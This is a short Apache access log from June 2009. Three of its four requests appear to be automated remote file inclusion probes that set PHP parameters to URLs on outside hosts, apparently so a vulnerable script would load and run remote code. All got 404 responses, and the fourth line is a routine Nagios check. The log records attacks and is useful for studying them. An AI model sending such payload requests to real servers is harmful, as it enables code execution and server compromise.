94.23.200.54 - - [19/Jun/2009:04:00:36 -0400] "GET /logs/access_log.Q109061200%20%20///blog.inc.php?_SERVER[DOCUMENT_ROOT]=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
218.234.21.178 - - [19/Jun/2009:04:00:40 -0400] "GET /logs/access_log.Q109052500//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.12.99 - - [19/Jun/2009:04:01:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.49.99.7 - - [19/Jun/2009:04:01:07 -0400] "GET /logs/access_log.Q109060800%20%20/includes/class_item.php?fileExtension=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
